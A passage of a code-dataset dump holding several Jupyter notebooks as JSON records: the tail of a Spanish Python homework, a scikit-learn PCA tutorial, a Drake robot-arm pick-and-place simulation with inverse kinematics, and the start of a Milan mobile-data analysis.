c%1\nwhile(f!=0):\n c = float(input('No se ingresó un valor entero para c, vuelva a ingresar otro valor para c: '))\n f = c%1\nc = int(c)\nif (c>max):\n max = c\nprint('Los valores ingresados fueron ',a,'y',b,'y',c,',y el mayor fue:',max)\n","repo_name":"josemanuelpiro97/curso_Python","sub_path":"Constantino_Aiassa/Tarea_N1.ipynb","file_name":"Tarea_N1.ipynb","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"28002906005","text":"# # Principal Component Analysis (PCA)\n\n# %matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\n\n# ## PCA on two-dimensional (2D) data\n# It will be easy to show what PCA does by using a 2D dataset.\n# Consider the following 200 points:\n\nrng = np.random.RandomState(1)\nX = np.dot(rng.rand(2, 2), rng.randn(2, 200)).T\nfig, ax = plt.subplots()\nax.plot(X[:, 0], X[:, 1],'.')\nax.axis('equal')\nax.set_title('200 data points in 2D space', fontsize=16)\n#each row of X is a data point\n\nprint(X)\n\n# It seems that the data points are spread out along a principal direction.
\n# What is that principal direction/axis ?
\n# Now, let's use Scikit-Learn's ``PCA`` to find out ...\n\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=2, whiten=False)\npca.fit(X)\n\n# The line `pca.fit(X)` hides all of the details of the algorithm
\n# It basically follows the three algorithm-steps:
\n# (1) Estimate the mean 𝜇 and covariance matrix C
\n# (2) Compute the eigenvectors 𝑤_1, 𝑤_2…, of 𝐶, corresponding to the largest eigenvalues 𝜆_1, the second largest 𝜆_2,…
\n# (3) Compute the reduced representation of data\n\n# There are many attributes of pca
\n# https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html
\n# For example, `pca.explained_variance_` - what does it mean ? \n\n# `pca.mean_` stores the sample mean 𝜇 \n\npca.mean_ \n\n# `pca.get_covariance()` returns the covariance matrix C
\n# note: if you set whiten=True in PCA(n_components=2, whiten=False), the output C is weird\n\nC=pca.get_covariance()\nC\n\nfrom numpy.linalg import eig\neig(C) # column is the eigenvector\n\n# `pca.components_` stores the eigenvectors
\n# shape (n_components, n_features)\n\npca.components_\n\n# `pca.explained_variance_` stores the eigenvalues of the covariance matrix C
\n# shape (n_components,)\n\npca.explained_variance_\n\n# `pca.singular_values_` stores the singular values of X from SVD\n\npca.singular_values_\n\nfrom numpy.linalg import svd\nsvd(X)\n\n# Relationship between `pca.singular_values_` and `pca.explained_variance_`
\n# see \"Singular Value Decomposition (SVD) and Eigen Decomposition\" in lecture notes\n\npca.explained_variance_*X.shape[0] # X.shape[0] is the number of data points\n\npca.singular_values_**2\n\n\n# To 'see' what these numbers mean, let's visualize them as vectors over the input data, using the \"components\" to define the direction of the vector, and the \"explained variance\" to define the squared-length of the vector:\n\n# +\ndef draw_vector(v0, v1, ax=None):\n ax = ax or plt.gca()\n arrowprops=dict(arrowstyle='->', linewidth=2, color ='k',\n shrinkA=0, shrinkB=0)\n ax.annotate('', v1, v0, arrowprops=arrowprops)\n\n# plot data\nplt.plot(X[:, 0], X[:, 1], '.')\nfor length, vector in zip(pca.explained_variance_, pca.components_):\n v = vector * 3 * np.sqrt(length)\n draw_vector(pca.mean_, pca.mean_ + v)\nplt.axis('equal');\n# -\n\n# These vectors represent the *principal axes/directions* of the data, and the length of the vector is an indication of how \"important\" that axis is in describing the distribution of the data—more precisely, it is a measure of the variance of the data when projected onto that axis.\n# The projection of each data point onto the principal axes are the \"principal components\" of the data.
\n# We use `pca.transform(X)` to compute the principal components of each data point\n\nBeta = pca.transform(X)\nBeta[0,:]\n\nnp.sum(pca.components_[0,:]*(X[0,:]-pca.mean_))\n\nnp.sum(pca.components_[1,:]*(X[0,:]-pca.mean_))\n\n# PCA parameter `whiten=True` by default, and then `pca.transform(X)` does not perform normalization by eigenvalues
\n\nBeta = pca.transform(X) # Beta[0,:] is beta0 in lecture notes\nY = Beta/ np.sqrt(pca.explained_variance_) \nY[0,:] # It is y0 in lecture notes\n\nnp.sum(pca.components_[0,:]*(X[0,:]-pca.mean_))/np.sqrt(pca.explained_variance_[0])\n\nnp.sum(pca.components_[1,:]*(X[0,:]-pca.mean_))/np.sqrt(pca.explained_variance_[1])\n\n# Now, we can show the original data points X and the transformed data points Y\n\nfig, ax = plt.subplots(1, 2, figsize=(16, 6))\nfig.subplots_adjust(left=0.0625, right=0.95, wspace=0.1)\n# plot data\nax[0].plot(X[:, 0], X[:, 1], '.')\nfor length, vector in zip(pca.explained_variance_, pca.components_):\n v = vector * 3 * np.sqrt(length)\n draw_vector(pca.mean_, pca.mean_ + v, ax=ax[0])\nax[0].axis('equal');\nax[0].set(xlabel='x1', ylabel='x2')\nax[0].set_title('original data X', fontsize=20)\n# plot principal components\nax[1].plot(Y[:, 0], Y[:, 1], '.')\ndraw_vector([0, 0], [0, 3], ax=ax[1])\ndraw_vector([0, 0], [3, 0], ax=ax[1])\nax[1].axis('equal')\nax[1].set(xlabel='component 1', ylabel='component 2',\n xlim=(-3.5, 3.5), ylim=(-3.5, 3.5))\nax[1].set_title('transformed data Y - principal components of X', fontsize=20)\n\n# This transformation from data axes to principal axes is an *affine transformation*, which basically means it is composed of a translation, rotation, and uniform scaling.\n#\n# Thus, PCA is a linear transform\n\n# #### Let's set `whiten=True` to directly get y\n\npca_w = PCA(n_components=2, whiten=True)\npca_w.fit(X)\nY_w = pca_w.transform(X) # Y_w[0,:] is y0 in lecture notes\n\nY[0,:]\n\nY_w[0,:]\n\nY[1,:]\n\nY_w[1,:]\n\n#this is weird, not the original covariance matrix\n#see the code https://github.com/scikit-learn/scikit-learn/blob/b194674c4/sklearn/decomposition/_base.py#L26\nC_w=pca_w.get_covariance()\nC_w\n\nC\n\n# ### PCA as dimensionality reduction\n#\n# The data X is in 2D space, i.e., each row is a data point that has two numbers
\n# The transformed data Y is still in 2D space.
\n# Now, we only select the first principal component for each data point
\n\nY0 = Y[:,0].reshape(-1,1)\nprint(\"original shape: \", X.shape)\nprint(\"transformed shape:\", Y0.shape)\n\n# We can start from the beginning by setting n_components to 1 \n\npca1 = PCA(n_components=1, whiten=True)#set whiten=True, we get y from the pca (forward) transform\npca1.fit(X)\nY1d = pca1.transform(X)\nprint(\"original shape: \", X.shape)\nprint(\"transformed shape:\", Y1d.shape)\n\n# The transformed data has been reduced to a single dimension.\n# To understand the effect of this dimensionality reduction, we can perform the inverse transform of this reduced data `Y1d` to obtain a reconstructed version `X_rec` of the original data `X`\n\nX_rec = pca1.inverse_transform(Y1d)\nfig, ax = plt.subplots()\nax.plot(X[:, 0], X[:, 1], 'b.')\nax.plot(X_rec[:, 0], X_rec[:, 1], 'r.')\nax.axis('equal')\n\n# The blue points are the original data, while the red points are the projected version.\n# This makes clear what a PCA dimensionality reduction means: the information along the least important principal axis or axes is removed, leaving only the component(s) of the data with the highest variance.\n# The fraction of variance that is cut out (proportional to the spread of points about the line formed in this figure) is roughly a measure of how much \"information\" is discarded in this reduction of dimensionality.\n#\n# This reduced-dimension dataset is in some senses \"good enough\" to encode the most important relationships between the points: the overall relationship between the data points are mostly preserved.\n","repo_name":"jshudak/Python","sub_path":"CSC546/hw2s/PCA.ipynb","file_name":"PCA.ipynb","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"5000597894","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"sXAaoUZHGM6e\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"b54b8339-d1f9-4eaa-8b65-1b486ecd4281\"\nimport importlib\nimport os, sys\nfrom urllib.request import urlretrieve\n\nif 'google.colab' in sys.modules and importlib.util.find_spec('manipulation') is None:\n urlretrieve(f\"http://manipulation.csail.mit.edu/scripts/setup/setup_manipulation_colab.py\",\n \"setup_manipulation_colab.py\")\n from setup_manipulation_colab import setup_manipulation\n setup_manipulation(manipulation_sha='47a354700b3bc48861400bbe4eb16ad54cf08c05', drake_version='20201101', drake_build='nightly')\n\nfrom IPython import get_ipython\nrunning_as_notebook = get_ipython() and hasattr(get_ipython(), 'kernel')\n\n# setup ngrok server\nserver_args = []\nif 'google.colab' in sys.modules:\n server_args = ['--ngrok_http_tunnel']\n\n# start a single meshcat server instance to use for remainder of this notebook.\nfrom meshcat.servers.zmqserver import start_zmq_server_as_subprocess\nproc, zmq_url, web_url = start_zmq_server_as_subprocess(server_args=server_args)\n\nimport numpy as np\nfrom IPython.display import display, HTML\nfrom pydrake.examples.manipulation_station import ManipulationStation\n\nimport matplotlib.pyplot as plt, mpld3\nif running_as_notebook:\n mpld3.enable_notebook()\n\nimport pydrake\nfrom pydrake.all import (\n DiagramBuilder, ConnectMeshcatVisualizer, Simulator, FindResourceOrThrow,\n Parser, MultibodyPlant, RigidTransform, LeafSystem, BasicVector,\n JacobianWrtVariable, RollPitchYaw, SignalLogger, AddTriad,\n PiecewisePolynomial, PiecewiseQuaternionSlerp, RotationMatrix, Solve,\n TrajectorySource\n)\n\nfrom pydrake.multibody import inverse_kinematics\nfrom pydrake.all import SnoptSolver, IpoptSolver\nfrom pydrake.trajectories import PiecewisePolynomial\n#########################\n# Imports from clutter generation notebook\nimport numpy as np\nfrom IPython.display import display, HTML\nfrom ipywidgets import Textarea\n\nfrom pydrake.all import ( \n AddMultibodyPlantSceneGraph, ConnectMeshcatVisualizer, \n DiagramBuilder, RigidTransform, RotationMatrix, Box, \n CoulombFriction, FindResourceOrThrow, FixedOffsetFrame, \n GeometryInstance, MeshcatContactVisualizer, Parser, PlanarJoint, \n JointIndex, Simulator, ProcessModelDirectives, LoadModelDirectives\n)\n\nfrom functools import partial\nimport open3d as o3d\nimport matplotlib.pyplot as plt\nfrom IPython.display import display, HTML\nimport meshcat\nimport meshcat.geometry as g\nimport meshcat.transformations as tf\n\nfrom pydrake.all import (\n ConnectPlanarSceneGraphVisualizer,\n ConnectDrakeVisualizer, DepthCameraProperties, RgbdSensor,\n RandomGenerator, UniformlyRandomRotationMatrix, RollPitchYaw,\n MakeRenderEngineVtk, RenderEngineVtkParams, Role, UnitInertia, set_log_level\n)\n\nfrom ipywidgets import Dropdown, FloatSlider, Layout\nfrom pydrake.all import (\n Sphere, Cylinder, Box, Capsule, Ellipsoid, SpatialInertia)\n\nimport pydrake\n\n#from pydrake.multibody.jupyter_widgets import MakeJointSlidersThatPublishOnCallback\nfrom manipulation.jupyter_widgets import MakeJointSlidersThatPublishOnCallback\nfrom manipulation.meshcat_utils import draw_open3d_point_cloud, draw_points\nfrom manipulation.open3d_utils import create_open3d_point_cloud\nfrom manipulation.mustard_depth_camera_example import MustardExampleSystem\nfrom manipulation.scenarios import AddRgbdSensors\nfrom manipulation.utils import FindResource\n\nset_log_level(\"warn\");\n\nycb = [(\"cracker\", \"003_cracker_box.sdf\"), \n (\"sugar\", \"004_sugar_box.sdf\"), \n (\"soup\", \"005_tomato_soup_can.sdf\"), \n (\"mustard\", \"006_mustard_bottle.sdf\"), \n (\"gelatin\", \"009_gelatin_box.sdf\"), \n (\"meat\", \"010_potted_meat_can.sdf\")]\n\n#########################\n\ndef setup_manipulation_station():\n builder = DiagramBuilder()\n station = builder.AddSystem(ManipulationStation(time_step=1e-3)) #station.SetupManipulationClassStation() #station.SetupClutterClearingStation()\n\n plant = station.get_multibody_plant()\n parser = Parser(plant, station.get_mutable_scene_graph())\n parser.AddModelFromFile(FindResourceOrThrow(\n \"drake/examples/manipulation_station/models/bin.sdf\"))\n plant.WeldFrames(A = plant.world_frame(), \n B = plant.GetFrameByName(\"bin_base\"),\n X_AB = RigidTransform.Identity())\n table = parser.AddModelFromFile(FindResourceOrThrow(\"drake/examples/manipulation_station/models/bin.sdf\"), \"table\")\n plant.WeldFrames(plant.world_frame(), plant.GetFrameByName(\"bin_base\", table), RigidTransform(rpy=RollPitchYaw([np.pi, 0, 0]), p=[-.5, -.6, .2]))\n\n iiwa_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/iiwa_description/iiwa7/\"\n \"iiwa7_no_collision.sdf\")\n iiwa = parser.AddModelFromFile(iiwa_model_file, \"iiwa\")\n X_WI = RigidTransform(rpy=RollPitchYaw([0, 0, np.pi/2]), p=np.array([-0.5, 0, 0])) #.Identity()\n plant.WeldFrames(plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa),\n X_WI)\n wsg_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/wsg_50_description/sdf/\"\n \"schunk_wsg_50.sdf\")\n wsg = parser.AddModelFromFile(wsg_model_file, \"gripper\")\n X_7G = RigidTransform(rpy=RollPitchYaw([np.pi/2, 0, np.pi/2]), p=[0, 0, 0.114])#RigidTransform.Identity()\n plant.WeldFrames(\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg),\n X_7G)\n\n station.RegisterIiwaControllerModel(\n iiwa_model_file, iiwa, plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa), X_WI)\n station.RegisterWsgControllerModel(\n wsg_model_file, wsg,\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg), X_7G)\n \n i = 2\n object_num = i\n sdf = FindResourceOrThrow(\"drake/manipulation/models/ycb/sdf/\" + ycb[object_num][1])\n parser.AddModelFromFile(sdf, f\"object{i}\")\n\n station.Finalize()\n\n frames_to_draw = {\"gripper\": {\"body\"}}\n meshcat = ConnectMeshcatVisualizer(builder,\n station.get_scene_graph(),\n output_port=station.GetOutputPort(\"pose_bundle\"),\n delete_prefix_on_load=False,\n frames_to_draw=frames_to_draw,\n zmq_url=zmq_url)\n \n diagram = builder.Build()\n \n context = plant.CreateDefaultContext()\n gripper = plant.GetBodyByName(\"body\")\n \n initial_pose = plant.EvalBodyPoseInWorld(context, gripper)\n\n simulator = Simulator(diagram)\n context = simulator.get_mutable_context()\n plant_context = plant.GetMyContextFromRoot(context)\n\n for body_index in plant.GetFloatingBaseBodies():\n #tf = RigidTransform(rpy=RollPitchYaw([0, 0, 0]), p=[0,0,0.05])\n theta = np.random.rand() * 2 * np.pi\n tf = tf = RigidTransform(\n RotationMatrix(pydrake.common.eigen_geometry.AngleAxis_(theta, np.array([0, 0, 1]))), \n [np.random.uniform(-.1,.1), np.random.uniform(-.15, .15), .07])\n plant.SetFreeBodyPose(plant_context, \n plant.get_body(body_index),\n tf)\n\n simulator.set_target_realtime_rate(1.0)\n #simulator.AdvanceTo(0.01)\n simulator.AdvanceTo(1.)\n for body_index in plant.GetFloatingBaseBodies():\n final_pose = plant.GetFreeBodyPose(plant_context, plant.get_body(body_index))\n return initial_pose, meshcat, final_pose\n\n# Get initial pose of the gripper by using default context of manip station.\ninitial_pose, meshcat, final_pose = setup_manipulation_station()\n\n# Helper function to visualize triad given a rigid transform. \ndef visualize_transform(name, transform, prefix='', length=0.15, radius=0.006):\n # Support RigidTransform as well as 4x4 homogeneous matrix.\n if isinstance(transform, RigidTransform):\n transform = transform.GetAsMatrix4()\n AddTriad(meshcat.vis, name=name, prefix=prefix, length=length, radius=0.005, opacity=0.2)\n meshcat.vis[prefix][name].set_transform(transform)\n\np_WAbove = np.array([0, 0, .5]) # Position above bin. Pre/post-grasp pose.\np_WFinal = np.array([-.5, -.6, .5]) # Position above table\n\n# Interpolate pose for opening doors. \ndef InterpolatePoseOpen(t):\n angle_start, angle_end = 0, np.pi/2\n theta = angle_start + (angle_end - angle_start) * t\n p_WG = np.array([np.cos(theta)*.5, np.sin(theta)*-.6, np.sin(theta)*-.2]) + np.array([-.5, 0, .5])\n TEMP = RollPitchYaw(0, np.pi/2 - theta, -theta).ToRotationMatrix()\n R_WG = TEMP.multiply(RollPitchYaw(0, np.pi, 3*np.pi/2).ToRotationMatrix())\n\n X_WG = RigidTransform(R_WG, p_WG)\n\n return X_WG\n\n## Interpolate Pose for entry.\ndef make_gripper_orientation_trajectory():\n traj = PiecewiseQuaternionSlerp()\n traj.Append(0.0, initial_pose.rotation())\n traj.Append(5.0, InterpolatePoseOpen(0.0).rotation())\n return traj \n\ndef make_gripper_position_trajectory():\n traj = PiecewisePolynomial.FirstOrderHold(\n [0.0, 5.0], \n np.vstack([[initial_pose.translation()],\n [InterpolatePoseOpen(0.0).translation()]]).T)\n return traj\n\nentry_traj_rotation = make_gripper_orientation_trajectory()\nentry_traj_translation = make_gripper_position_trajectory()\n\ndef InterpolatePoseEntry(t):\n return RigidTransform(RotationMatrix(entry_traj_rotation.value(t)), \n entry_traj_translation.value(t))\n\ndef GenerateTrajectory(start, end, initialpose, goalpose):\n traj_translation = PiecewisePolynomial.FirstOrderHold(\n [start, end],\n np.vstack([[initialpose.translation()], [goalpose.translation()]]).T\n )\n traj_rotation = PiecewiseQuaternionSlerp()\n traj_rotation.Append(start, initialpose.rotation())\n traj_rotation.Append(end, goalpose.rotation())\n return traj_translation, traj_rotation\n\ndef GenerateInterpolation(start, end, initialpose, goalpose):\n '''\n Given start/end times and poses, interpolates between them and creates a function to access the interpolated poses at various times\n '''\n traj_t, traj_r = GenerateTrajectory(start, end, initialpose, goalpose)\n def InterpolatePoseFxn(t):\n return RigidTransform(RotationMatrix(traj_r.value(t)), traj_t.value(t))\n return InterpolatePoseFxn\n\n# Generate interpolation functions\n# Initial pose -> elevated pose (to avoid hitting bin)\nelev_pose = RigidTransform(initial_pose.rotation(), initial_pose.translation() + np.array([0, .1, .3]))\nInterpolatePose_Init_Elev = GenerateInterpolation(0, 1., initial_pose, elev_pose)\n# Elevated pose -> pre-grasp pose\np, r = final_pose.translation(), final_pose.rotation().matrix()\nz_axis = r[:, 1].flatten()\ny_axis = np.array([0, 0, -1.])\nx_axis = np.cross(y_axis, z_axis)\nmat = np.vstack([x_axis, y_axis, z_axis]).transpose()\nrotmat = RotationMatrix(mat)\ntranslation = np.array([p[0], p[1], elev_pose.translation()[-1]])\npg_pose = RigidTransform(rotmat, translation)\nInterpolatePose_Elev_Pg = GenerateInterpolation(1., 2.5, elev_pose, pg_pose)\n# Pre-grasp pose -> grab object pose\ntranslation = np.array([p[0], p[1], p[2] + .09])\ngrab_pose = RigidTransform(rotmat, translation)\nInterpolatePose_Pg_Grab = GenerateInterpolation(2.5, 4, pg_pose, grab_pose)\n# Grab object pose -> pre-grasp pose\npost_grab_pose = InterpolatePoseOpen(0)\nInterpolatePose_Grab_Pg = GenerateInterpolation(6, 7, grab_pose, post_grab_pose)\n# Place pose -> move back pose\nback_pose = RigidTransform(InterpolatePoseOpen(1).rotation(), InterpolatePoseOpen(1).translation() + np.array([0, 0, .1]))\nInterpolatePose_Place_Back = GenerateInterpolation(12, 15, InterpolatePoseOpen(1), back_pose)\n# Move back pose -> pre-grasp pose\nInterpolatePose_Back_Pg = GenerateInterpolation(13, 15, back_pose, pg_pose)\n\n# Wrapper function for end-effector pose. Total time: 12 seconds.\ndef InterpolatePose(t):\n if t < 1.:\n return InterpolatePose_Init_Elev(t)\n elif (t >= 1.) and (t < 2.5):\n return InterpolatePose_Elev_Pg(t)\n elif (t >= 2.5) and (t < 4.):\n return InterpolatePose_Pg_Grab(t)\n elif (t >= 4.) and (t < 6.):\n return InterpolatePose_Pg_Grab(4.)\n elif (t >= 6.) and (t < 7.):\n return InterpolatePose_Grab_Pg(t)\n elif (t >= 7.) and (t < 11.):\n return InterpolatePoseOpen((t - 7.) / 4.)\n elif (t >= 11.) and (t < 12):\n return InterpolatePoseOpen(1)\n else: #elif (t >= 12.) and (t < 15.):\n return InterpolatePose_Place_Back(t)\n ''' else:\n return InterpolatePose_Back_Pg(t) '''\n\n\n# Visualize our end-effector nominal trajectory. \nt_lst = np.linspace(0, 15, 30)\npose_lst = []\n\nvisualize_enabled = True\n\nfor t in t_lst:\n if visualize_enabled:\n visualize_transform(str(t), InterpolatePose(t))\n pose_lst.append(InterpolatePose(t))\n\n# Create gripper trajectory. \ngripper_t_lst = np.array([0., 5., 6., 11., 12., 15.])\ngripper_knots = np.array([0.05, 0.05, 0., 0., 0.05, 0.05]).reshape(1,6)\ng_traj = PiecewisePolynomial.FirstOrderHold(gripper_t_lst, gripper_knots)\n\ndef CreateIiwaControllerPlant():\n \"\"\"creates plant that includes only the robot and gripper, used for controllers.\"\"\"\n robot_sdf_path = FindResourceOrThrow(\n \"drake/manipulation/models/iiwa_description/iiwa7/iiwa7_no_collision.sdf\")\n gripper_sdf_path = FindResourceOrThrow(\n \"drake/manipulation/models/wsg_50_description/sdf/schunk_wsg_50_no_tip.sdf\")\n \n sim_timestep = 1e-3\n plant_robot = MultibodyPlant(sim_timestep)\n parser = Parser(plant=plant_robot)\n parser.AddModelFromFile(robot_sdf_path)\n parser.AddModelFromFile(gripper_sdf_path)\n plant_robot.WeldFrames(\n A=plant_robot.world_frame(),\n B=plant_robot.GetFrameByName(\"iiwa_link_0\"),\n X_AB=RigidTransform(rpy=RollPitchYaw([0, 0, np.pi/2]), p=np.array([-0.5, 0, 0]))\n )\n plant_robot.WeldFrames(\n A=plant_robot.GetFrameByName(\"iiwa_link_7\"),\n B=plant_robot.GetFrameByName(\"body\"),\n X_AB=RigidTransform(RollPitchYaw(np.pi/2, 0, np.pi/2), np.array([0, 0, 0.114]))\n )\n\n plant_robot.mutable_gravity_field().set_gravity_vector([0, 0, 0])\n plant_robot.Finalize()\n\n link_frame_indices = []\n for i in range(8):\n link_frame_indices.append(\n plant_robot.GetFrameByName(\"iiwa_link_\" + str(i)).index())\n\n return plant_robot, link_frame_indices\n\ndef BuildAndSimulateTrajectory(q_traj, g_traj):\n \"\"\"Simulate trajectory for manipulation station.\n @param q_traj: Trajectory class used to initialize TrajectorySource for joints.\n @param g_traj: Trajectory class used to initialize TrajectorySource for gripper.\n \"\"\"\n builder = DiagramBuilder()\n station = builder.AddSystem(ManipulationStation(time_step=1e-3))\n plant = station.get_multibody_plant()\n parser = Parser(plant, station.get_mutable_scene_graph())\n parser.AddModelFromFile(FindResourceOrThrow(\n \"drake/examples/manipulation_station/models/bin.sdf\"))\n plant.WeldFrames(A = plant.world_frame(), \n B = plant.GetFrameByName(\"bin_base\"),\n X_AB = RigidTransform.Identity())\n #bin = parser.AddModelFromFile(FindResource(\"models/shelves.sdf\"))\n #plant.WeldFrames(plant.world_frame(), plant.GetFrameByName(\"shelves_body\", bin), RigidTransform([0.6,0,0.4]))\n table = parser.AddModelFromFile(FindResourceOrThrow(\"drake/examples/manipulation_station/models/bin.sdf\"), \"table\")\n plant.WeldFrames(plant.world_frame(), plant.GetFrameByName(\"bin_base\", table), RigidTransform(rpy=RollPitchYaw([np.pi, 0, 0]), p=[-.5, -.6, .2]))\n\n iiwa_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/iiwa_description/iiwa7/\"\n \"iiwa7_no_collision.sdf\")\n iiwa = parser.AddModelFromFile(iiwa_model_file, \"iiwa\")\n X_WI = RigidTransform(rpy=RollPitchYaw([0, 0, np.pi/2]), p=np.array([-0.5, 0, 0])) #.Identity()\n plant.WeldFrames(plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa),\n X_WI)\n wsg_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/wsg_50_description/sdf/\"\n \"schunk_wsg_50.sdf\")\n wsg = parser.AddModelFromFile(wsg_model_file, \"gripper\")\n X_7G = RigidTransform(rpy=RollPitchYaw([np.pi/2, 0, np.pi/2]), p=[0, 0, 0.114])#RigidTransform.Identity()\n plant.WeldFrames(\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg),\n X_7G)\n\n station.RegisterIiwaControllerModel(\n iiwa_model_file, iiwa, plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa), X_WI)\n station.RegisterWsgControllerModel(\n wsg_model_file, wsg,\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg), X_7G)\n \n i = 2\n object_num = i\n sdf = FindResourceOrThrow(\"drake/manipulation/models/ycb/sdf/\" + ycb[object_num][1])\n parser.AddModelFromFile(sdf, f\"object{i}\")\n\n station.Finalize()\n\n q_traj_system = builder.AddSystem(TrajectorySource(q_traj))\n g_traj_system = builder.AddSystem(TrajectorySource(g_traj))\n\n meshcat = ConnectMeshcatVisualizer(builder,\n station.get_scene_graph(),\n output_port=station.GetOutputPort(\"pose_bundle\"),\n delete_prefix_on_load=True,\n frames_to_draw={\"gripper\":{\"body\"}},\n zmq_url=zmq_url)\n \n builder.Connect(q_traj_system.get_output_port(),\n station.GetInputPort(\"iiwa_position\"))\n builder.Connect(g_traj_system.get_output_port(),\n station.GetInputPort(\"wsg_position\"))\n \n diagram = builder.Build()\n\n simulator = Simulator(diagram)\n context = simulator.get_mutable_context()\n plant_context = plant.GetMyContextFromRoot(context)\n\n for body_index in plant.GetFloatingBaseBodies():\n tf = final_pose\n plant.SetFreeBodyPose(plant_context, \n plant.get_body(body_index),\n tf)\n simulator.set_target_realtime_rate(1.0)\n simulator.AdvanceTo(0.01)\n\n station_plant = station.get_multibody_plant()\n \n return simulator, station_plant\n\n\n# + id=\"d9b_FojtUQoP\"\ndef create_q_knots(pose_lst):\n \"\"\"Convert end-effector pose list to joint position list using series of \n InverseKinematics problems. Note that q is 9-dimensional because the last 2 dimensions \n contain gripper joints, but these should not matter to the constraints.\n @param: pose_lst (python list): post_lst[i] contains keyframe X_WG at index i.\n @return: q_knots (python_list): q_knots[i] contains IK solution that will give f(q_knots[i]) \\approx pose_lst[i].\n \"\"\"\n q_knots = []\n plant, _ = CreateIiwaControllerPlant()\n world_frame = plant.world_frame()\n gripper_frame = plant.GetFrameByName(\"body\")\n q_nominal = np.array([ 0., 0.6, 0., -1.75, 0., 1., 0., 0., 0.]) # nominal joint for joint-centering.\n\n def AddOrientationConstraint(ik, R_WG, bounds):\n \"\"\"Add orientation constraint to the ik problem. Implements an inequality \n constraint where the axis-angle difference between f_R(q) and R_WG must be\n within bounds. Can be translated to:\n ik.prog().AddBoundingBoxConstraint(angle_diff(f_R(q), R_WG), -bounds, bounds)\n \"\"\"\n ik.AddOrientationConstraint(\n frameAbar=world_frame, R_AbarA=R_WG, \n frameBbar=gripper_frame, R_BbarB=RotationMatrix(),\n theta_bound=bounds\n )\n\n def AddPositionConstraint(ik, p_WG_lower, p_WG_upper):\n \"\"\"Add position constraint to the ik problem. Implements an inequality\n constraint where f_p(q) must lie between p_WG_lower and p_WG_upper. Can be\n translated to \n ik.prog().AddBoundingBoxConstraint(f_p(q), p_WG_lower, p_WG_upper)\n \"\"\"\n ik.AddPositionConstraint(\n frameA=world_frame, frameB=gripper_frame, p_BQ=np.zeros(3),\n p_AQ_lower=p_WG_lower, p_AQ_upper=p_WG_upper)\n\n for i in range(len(pose_lst)):\n ik = inverse_kinematics.InverseKinematics(plant)\n q_variables = ik.q() # Get variables for MathematicalProgram\n prog = ik.prog() # Get MathematicalProgram\n\n #### Modify here ###############################\n des_pose = pose_lst[i]\n des_translation = des_pose.translation()\n des_rotation = des_pose.rotation()\n\n TEMP = q_nominal - q_variables\n prog.AddCost(TEMP.dot(TEMP)) # Joint centering cost\n\n if i == 0:\n init_guess = q_nominal\n else:\n init_guess = q_knots[-1]\n \n prog.SetInitialGuess(q_variables, init_guess)\n\n theta_bound = np.pi / 24\n t_bound = np.array([0, 0, .01])\n\n AddOrientationConstraint(ik, des_rotation, theta_bound)\n AddPositionConstraint(ik, des_translation - t_bound, des_translation + t_bound)\n\n ################################################\n \n result = Solve(prog)\n\n if not result.is_success():\n raise RuntimeError\n \n q_knots.append(result.GetSolution(q_variables))\n\n return q_knots\n\n\n# + id=\"tXpo5zh4PMqB\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"96aec6a3-6d93-4c20-e079-a3e7bbcfea10\"\nq_knots = np.array(create_q_knots(pose_lst))\nq_traj = PiecewisePolynomial.CubicShapePreserving(t_lst, q_knots[:, 0:7].T)\nsimulator, station_plant = BuildAndSimulateTrajectory(q_traj, g_traj)\n\n# + id=\"z5K2pFrWnGAt\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"d3294f9c-fdaf-46af-82fe-1c6ff2711d4f\"\nsimulator.AdvanceTo(0.1)\n# Uncomment and run the simulation to 12 seconds for results.\nsimulator.AdvanceTo(15.0)\n\n# + id=\"kL_h0-nna6QL\"\n\n","repo_name":"verityw/manipulation-final-project","sub_path":"PlaceUpright.ipynb","file_name":"PlaceUpright.ipynb","file_ext":"py","file_size_in_byte":21347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"28060501942","text":"import geojson\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nwith open(\"data/milano-grid.geojson\") as json_file:\n grid_json = geojson.load(json_file)\n\nwith open(\"data/Italian_provinces.geojson\") as json_file:\n provinces_json = geojson.load(json_file)\n\nfrom functools import reduce\nstart_day = 1\nend_day = 1 + 1\n\n# +\n# Milan to provinces\nm2p_df = []\nfor day in range(start_day, end_day):\n m2p_df.append(pd.read_csv(\"data/mi-to-provinces-2013-11-{:02}.csv\".format(day), engine =\"python\", index_col=0))\n \nm2p_df = pd.concat(m2p_df)\n# -\n\ntime_indices = pd.concat([pd.DataFrame(np.repeat(m2p_df.index.drop_duplicates().values, 10000), columns=['datetime'])]).reset_index(drop=True)\ncell_indices = pd.concat([pd.DataFrame(np.arange(10000), columns=['Cell1D'])] * 24).reset_index(drop=True)\n\n# +\nnew_m2p_df = pd.concat([time_indices, cell_indices], axis=1)\nnew_m2p_df = new_m2p_df.set_index('datetime')\n\n# for index, row in 